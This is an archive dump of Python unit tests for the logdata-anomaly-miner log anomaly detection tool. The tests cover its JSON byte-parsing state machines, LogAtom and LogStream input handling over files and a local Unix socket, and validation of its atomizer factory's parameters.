self.check_number_machine(check_float_value, value, end_sign) value = b'-21.05' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56E-5' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56e-5' self.check_number_machine(check_float_value, value, end_sign) def test20number_machine_end_signs(self): """Check if all non numerical signs end the number_machine.""" def check_int_value(data, byte_data): self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) value = b'222' end_signs = list(range(0x2e)) + list(range(0x3a, 0x45)) + list(range(0x46, 0x65)) + list(range(0x66, 0x80)) valid_signs = [0x2e, 0x45, 0x65] + list(range(0x30, 0x39)) for end_sign in end_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) for end_sign in valid_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNotNone(state(end_sign)) def test21number_machine_invalid_values(self): """Test invalid values in the number_machine.""" def raise_error(_data, _byte_data): raise Exception("Invalid number treated as valid!") value = b'- 222' state = number_machine(value[0], raise_error) self.assertIsNone(state(value[1])) # octal number value = b'0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) # negative octal number value = b'-0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])(value[2])) # hex number value = b'0x80' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) value = b'NaN' self.assertIsNone(number_machine(value[0], raise_error)) value = b'Infinity' self.assertIsNone(number_machine(value[0], raise_error)) value = b'.1' self.assertIsNone(number_machine(value[0], raise_error)) def check_number_machine_from_json_machine(self, check_int_value, value, end_sign): state = json_machine(check_int_value) for c in value: state = state(c) self.assertEqual(state(end_sign).__name__, '_value') def test22number_machine_started_from_json_machine(self): """Test if the number_machine is started from the json_machine.""" def check_int_value(data): self.assertEqual(data, {'value': int(value)}) def check_float_value(data): data['value'] = round(data['value'], 10) self.assertEqual(data, {'value': float(value)}) end_sign = ord('}') object_prefix = b'{"value": ' value = b'222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'-222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'+222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'0' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.50' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'-21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56E-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) def test23array_machine_valid_array(self): """Test possible valid arrays.""" def check_value(data): self.assertEqual(data, compare_value) value = b'"string", 22, 22.50, true, false, null]' compare_value = ['string', 22, 22.5, True, False, None] state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) value = b'\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]' state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) value = b'{"value": 22}, {"value": "string"}]' compare_value = [{'value': 22}, {'value': 'string'}] state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) def test24array_machine_invalid_formats(self): """Test the array_machine with invalid formats.""" def raise_error(_): raise Exception("Invalid returned as valid.") value = b'"string" 22, 22.50, true, false, null]' state = array_machine(raise_error) for c in value[:value.index(b'2') + 1]: state = state(c) self.assertIsNone(state) value = b'"key": {"value": 2}]' state = array_machine(raise_error) for c in value[:value.index(b':') + 1]: state = state(c) self.assertIsNone(state) def test25array_machine_started_from_json_machine(self): """Test if the array_machine is started from the json_machine.""" def check_value(data): self.assertEqual(data, compare_value) value = b'{"values_array": ["string", 22, 22.50, true, false, null]}' compare_value = {'values_array': ['string', 22, 22.5, True, False, None]} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b'{"values_array": [\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b'{"objects_array": [{"value": 22}, {"value": "string"}]}' compare_value = {'objects_array': [{'value': 22}, {'value': 'string'}]} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') def test26object_machine_valid_objects(self): """Check if the object_machine can handle different valid formats.""" def check_value(data): self.assertEqual(data, compare_value) # single line, no spaces value = b'"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}' compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']} state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) # single line with spaces value = b'"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}' state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) # multiline with tabs value = b'\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \ b'\n\t\t"Hello",\n\t\t"World"]}' state = object_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) def test27object_machine_invalid_values(self): """Test the object_machine with invalid values.""" def raise_error(_): raise Exception("Invalid returned as valid.") # keys without " value = b'"string":"Hello World",integer:22,"float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b'integer') + 1]: state = state(c) self.assertIsNone(state) # = instead of : value = b'"string":"Hello World","integer"=22,"float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b'=') + 1]: state = state(c) self.assertIsNone(state) # no comma after attribute. The error is only found after the next :. However this behavior is not problematic, because another # attribute or the end bracket } has to follow. value = b'"string":"Hello World","integer":22 "float":22.23,"bool":true,"array":["Hello","World"]}' state = object_machine(raise_error) for c in value[:value.index(b':22.') + 1]: state = state(c) self.assertIsNone(state) def test28object_machine_started_from_json_machine(self): """Test if the object_machine is started from the json_machine.""" def check_value(data): self.assertEqual(data, compare_value) # single line, no spaces value = b'{"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}' compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') # single line with spaces value = b'{"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') # multiline with tabs value = b'{\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \ b'\n\t\t"Hello",\n\t\t"World"]}' state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') value = b"""{"HistogramData": {"Bins": {"...-0]": 0, "[0-1]": 0, "[1-2]": 0, "[2-3]": 0, "[3-...]": 0\n}, "BinNames": ["...-0]", "[0-1]", "[1-2]", "[2-3]", "[3-...]"]}}""" compare_value = {"HistogramData": {"Bins": {'...-0]': 0, '[0-1]': 0, '[1-2]': 0, '[2-3]': 0, '[3-...]': 0}, "BinNames": [ '...-0]', '[0-1]', '[1-2]', '[2-3]', '[3-...]']}} state = json_machine(check_value) for c in value: state = state(c) self.assertEqual(state.__name__, '_value') def test29json_machine_only_allow_objects_at_start(self): """The json_machine must only allow objects at the start.""" def raise_error(_): raise Exception("Invalid returned as valid.") forbidden_values = [0x22, 0x2b, 0x2d, 0x31, 0x5b, 0x74, 0x66, 0x6e] for value in forbidden_values: state = json_machine(raise_error) self.assertIsNone(state(value)) state = json_machine(raise_error) self.assertIsNotNone(state(ord('{'))) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/LogAtomTest.py000066400000000000000000000051111500476301700256710ustar00rootroot00000000000000import unittest import sys import subprocess from time import time, sleep from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class LogAtomTest(TestBase): """Unittests for the LogAtom.""" def test1validate_parameters(self): """Test all initialization parameters for the event handler. Input parameters must be validated in the class.""" mc = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") me = fdme.get_match_element("", mc) pm = ParserMatch(me) self.assertRaises(TypeError, LogAtom, "", pm, 1, self) self.assertRaises(TypeError, LogAtom, ["default"], pm, 1, self) self.assertRaises(TypeError, LogAtom, None, pm, 1, self) self.assertRaises(TypeError, LogAtom, True, pm, 1, self) self.assertRaises(TypeError, LogAtom, 123, pm, 1, self) self.assertRaises(TypeError, LogAtom, 123.3, pm, 1, self) self.assertRaises(TypeError, LogAtom, {"id": "Default"}, pm, 1, self) self.assertRaises(TypeError, LogAtom, (), pm, 1, self) self.assertRaises(TypeError, LogAtom, set(), pm, 1, self) self.assertRaises(ValueError, LogAtom, b"", pm, 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, "", 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, ["default"], 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, True, 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, 123, 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, 123.3, 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, {"id": "Default"}, 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, (), 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, set(), 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, b"", 1, self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, "", self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, ["default"], self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, True, self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, {"id": "Default"}, self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, (), self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, set(), self) self.assertRaises(TypeError, LogAtom, fdme.data, pm, b"", self) LogAtom(b"data", None, None, None) if __name__ == '__main__': unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/LogStreamTest.py000066400000000000000000000351611500476301700262340ustar00rootroot00000000000000import unittest import os import base64 import socket import hashlib import subprocess from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource, LogStream from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer from unit.TestBase import TestBase, DummyFixedDataModelElement class LogStreamTest(TestBase): """Unittests for the LogStream.""" logfile = b"/tmp/log.txt" file = b"file://" def setUp(self): """Set up the logfile.""" super().setUp() with open(self.logfile, "w+") as f: for i in range(150): f.write("%d %s\r\n" % (i + 1, "d" * 1000)) def tearDown(self): """Remove the logfile.""" super().tearDown() os.remove(self.logfile) def test1file_log_data_resource_log_stream_closed_no_repositioning(self): """ In this case the log_stream_fd is -1 and repositioning_data is None. The next step is to open the stream successfully. Afterwards the buffer object is filled with data and the position is updated. """ fldr = FileLogDataResource(self.file + self.logfile, -1) fldr.open(False) self.assertEqual(fldr.buffer, b"") length = fldr.fill_buffer() self.assertEqual(length, fldr.default_buffer_size) fldr.update_position(length) self.assertEqual(fldr.buffer, b"") self.assertEqual(fldr.total_consumed_length, fldr.default_buffer_size) # repeat to see if total_consumed_length was changed. length = fldr.fill_buffer() self.assertEqual(length, fldr.default_buffer_size) fldr.update_position(length) self.assertEqual(fldr.buffer, b"") self.assertEqual(fldr.total_consumed_length, 2 * fldr.default_buffer_size) fldr.close() def test2unix_socket_log_data_resource(self): """ In this case the log_stream_fd is -1. The next step is to open the stream successfully. Therefor a server socket is set up listen to data to the server. Afterwards, the buffer object is filled with data and the position is updated. """ sock_name = b"/tmp/test5unixSocket.sock" proc = subprocess.Popen(["python3", "unit/input/client.py"]) if os.path.exists(sock_name): os.remove(sock_name) print("Opening socket...") server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) server.bind(sock_name) server.listen(1) connection = server.accept()[0] unix_socket_log_data_resource = UnixSocketLogDataResource(b"unix://" + sock_name, connection.fileno()) print("Listening...") unix_socket_log_data_resource.fill_buffer() self.assertEqual(repr(unix_socket_log_data_resource.buffer), repr(b"data")) print("Data received: %s" % unix_socket_log_data_resource.buffer.decode()) unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer)) self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 4) self.assertEqual(unix_socket_log_data_resource.buffer, b"") print("Shutting down...") unix_socket_log_data_resource.close() server.close() proc.terminate() proc.wait() print("Done") def test3_log_stream_handle_streams(self): """ This unit case verifies the functionality of the LogStream class. Different FileLogDataResources are added to the stream. The handling of not existing sources is also tested. """ fdme = DummyFixedDataModelElement("fdme", b"a1") bstla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 300, []) fldr = FileLogDataResource(self.file + self.logfile, -1) self.assertEqual(fldr.buffer, b"") ls = LogStream(fldr, bstla) fldr.open(False) ls.handle_stream() self.assertEqual(fldr.total_consumed_length + len(fldr.buffer), fldr.default_buffer_size) ls.handle_stream() self.assertEqual(fldr.total_consumed_length + len(fldr.buffer), fldr.default_buffer_size) fldr2 = FileLogDataResource(b"file:///var/log/auth.log", -1) self.assertEqual(fldr2.buffer, b"") fldr2.open(False) ls.add_next_resource(fldr2) ls.roll_over() ls.handle_stream() self.assertTrue(fldr.total_consumed_length > 0) self.assertEqual(fldr.total_consumed_length, fldr.default_buffer_size) self.assertTrue(fldr2.total_consumed_length > 0) ls.roll_over() fldr3 = FileLogDataResource(b"file:///var/log/123example.log", -1) fldr3.open(False) ls.add_next_resource(fldr3) self.assertRaises(OSError, ls.roll_over) def test4file_log_data_resource_log_stream_already_open_repositioning(self): """ In this case the logStreamFd is > 0 and repositioning_data is not None. The stream should be repositioned to the right position. """ fd = os.open("/tmp/log.txt", os.O_RDONLY) length = 65536 data = os.read(fd, length) md5 = hashlib.md5() md5.update(data) hash_digest = md5.digest() os.close(fd) fd = os.open("/tmp/log.txt", os.O_RDONLY) fldr = FileLogDataResource(self.file + self.logfile, fd, length, [os.fstat(fd).st_ino, length, base64.b64encode(hash_digest)]) fldr.fill_buffer() self.assertNotEqual(fldr.buffer, data) self.assertNotEqual(fldr.total_consumed_length, 0) # wrong inode number fldr = FileLogDataResource(self.file + self.logfile, fd, length, [os.fstat(fd).st_ino + 1, length, base64.b64encode(hash_digest)]) self.assertEqual(fldr.total_consumed_length, 0) # wrong size of repositioning data number FileLogDataResource(self.file + self.logfile, fd, length, [os.fstat(fd).st_ino, length + 1, base64.b64encode(hash_digest)]) self.assertEqual(fldr.total_consumed_length, 0) os.close(fd) def test4validate_parameters(self): """Test all initialization parameters. Input parameters must be validated in the class.""" fd = os.open("/tmp/log.txt", os.O_RDONLY) length = 65536 data = os.read(fd, length) md5 = hashlib.md5() md5.update(data) hash_digest = md5.digest() self.assertRaises(TypeError, FileLogDataResource, "file:///tmp/log.txt", fd, 65536) self.assertRaises(TypeError, FileLogDataResource, ["file:///tmp/log.txt"], fd, 65536) self.assertRaises(TypeError, FileLogDataResource, None, fd, 65536) self.assertRaises(TypeError, FileLogDataResource, True, fd, 65536) self.assertRaises(TypeError, FileLogDataResource, 123, fd, 65536) self.assertRaises(TypeError, FileLogDataResource, 123.23, fd, 65536) self.assertRaises(TypeError, FileLogDataResource, {"id": "Default"}, fd, 65536) self.assertRaises(TypeError, FileLogDataResource, (), fd, 65536) self.assertRaises(TypeError, FileLogDataResource, set("file:///tmp/log.txt"), fd, 65536) self.assertRaises(ValueError, FileLogDataResource, b"", fd, 65536) self.assertRaises(ValueError, FileLogDataResource, b"file://", -1) self.assertRaises(ValueError, FileLogDataResource, b"/var/log/syslog", -1) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", "123", 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", b"123", 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", None, 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", 123.3, 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", True, 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", {"id": "Default"}, 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", (), 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", set("123"), 65536) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, "123") self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, b"123") self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, None) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, True) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, {"id": "Default"}) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, ()) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, set("123")) self.assertRaises(ValueError, FileLogDataResource, b"file:///tmp/log.txt", fd, -1) self.assertRaises(ValueError, FileLogDataResource, b"file:///tmp/log.txt", fd, 0) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, "123") self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, b"123") self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, True) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, {"id": "Default"}) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, ()) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, set("123")) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino]) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino, length]) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino, length, base64.b64encode(hash_digest), 4]) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, ["d", length, base64.b64encode(hash_digest)]) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino, True, base64.b64encode(hash_digest)]) self.assertRaises(TypeError, FileLogDataResource, b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino, length, 1]) fldr = FileLogDataResource(b"file:///tmp/log.txt", fd, 65536, [os.fstat(fd).st_ino, length, base64.b64encode(hash_digest)]) FileLogDataResource(b"file:///tmp/log.txt", fd, 65536, None) self.assertRaises(ValueError, UnixSocketLogDataResource, b"/tmp/log", -1) self.assertRaises(TypeError, UnixSocketLogDataResource, "unix:///tmp/log.txt", fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, ["unix:///tmp/log.txt"], fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, None, fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, True, fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, 123, fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, 123.23, fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, {"id": "Default"}, fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, (), fd, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, set("file:///tmp/log.txt"), fd, 65536) self.assertRaises(ValueError, UnixSocketLogDataResource, b"", fd, 65536) self.assertRaises(ValueError, UnixSocketLogDataResource, b"unix://", -1) self.assertRaises(ValueError, UnixSocketLogDataResource, b"/var/log/syslog", -1) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", "123", 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", b"123", 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", None, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", 123.3, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", True, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", {"id": "Default"}, 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", (), 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", set("123"), 65536) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, "123") self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, b"123") self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, None) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, True) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, {"id": "Default"}) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, ()) self.assertRaises(TypeError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, set("123")) self.assertRaises(ValueError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, -1) self.assertRaises(ValueError, UnixSocketLogDataResource, b"unix:///tmp/log.txt", fd, 0) fdme = DummyFixedDataModelElement("fdme", b"a1") bstla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 300, []) self.assertRaises(TypeError, LogStream, "123", bstla) self.assertRaises(TypeError, LogStream, b"123", bstla) self.assertRaises(TypeError, LogStream, None, bstla) self.assertRaises(TypeError, LogStream, 123, bstla) self.assertRaises(TypeError, LogStream, 123.3, bstla) self.assertRaises(TypeError, LogStream, True, bstla) self.assertRaises(TypeError, LogStream, {"id": "Default"}, bstla) self.assertRaises(TypeError, LogStream, (), bstla) self.assertRaises(TypeError, LogStream, set("123"), bstla) self.assertRaises(TypeError, LogStream, fldr, "123") self.assertRaises(TypeError, LogStream, fldr, b"123") self.assertRaises(TypeError, LogStream, fldr, None) self.assertRaises(TypeError, LogStream, fldr, 123) self.assertRaises(TypeError, LogStream, fldr, 123.3) self.assertRaises(TypeError, LogStream, fldr, True) self.assertRaises(TypeError, LogStream, fldr, {"id": "Default"}) self.assertRaises(TypeError, LogStream, fldr, ()) self.assertRaises(TypeError, LogStream, fldr, set("123")) LogStream(fldr, bstla) os.close(fd) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/SimpleByteStreamLineAtomizerFactoryTest.py000066400000000000000000000346301500476301700334430ustar00rootroot00000000000000import unittest from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from unit.TestBase import TestBase, DummyFixedDataModelElement class SimpleByteStreamLineAtomizerFactoryTest(TestBase): """The SimpleByteStreamLineAtomizerFactory should return a valid ByteStreamLineAtomizer with all parameters of the Factory.""" def test1get_atomizer(self): """Tests the creating of an SimpleByteStreamLineAtomizer with the Factory.""" fdme = DummyFixedDataModelElement("fixed", b"fixed data") nmpd1 = NewMatchPathDetector(self.aminer_config, [], "Default", False) nmpd2 = NewMatchPathDetector(self.aminer_config, [], "Default", False) sbslaf = SimpleByteStreamLineAtomizerFactory(fdme, [nmpd1, nmpd2], [self.stream_printer_event_handler], None) bsla = sbslaf.get_atomizer_for_resource(None) self.assertEqual(bsla.atom_handler_list, [nmpd1, nmpd2]) self.assertEqual(bsla.event_handler_list, [self.stream_printer_event_handler]) self.assertEqual(bsla.default_timestamp_path_list, []) self.assertEqual(bsla.parsing_model, fdme) self.assertEqual(bsla.max_line_length, 65536) self.assertEqual(bsla.resource_name, None) def test2validate_parameters(self): """Test all initialization parameters for the atomizer. Input parameters must be validated in the class.""" data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, "default", [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, b"Default", [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, None, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, True, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, 123, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, 123.3, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, ["default"], [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, {"id": "Default"}, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, (), [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, set(), [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, "default", [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, b"Default", [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, True, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, 123, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, 123.3, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, ["default"], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, {"id": "Default"}, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, (), [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, set(), [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], "default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], b"Default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], None, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], True, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], 123, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], 123.3, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], ["default"], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], {"id": "Default"}, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], (), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], set(), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], "default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], b"Default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], None, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], True, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123.3, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], ["default"], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], (), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], set(), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], "default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], set()) SimpleByteStreamLineAtomizerFactory(fdme, [], [self.stream_printer_event_handler], None) 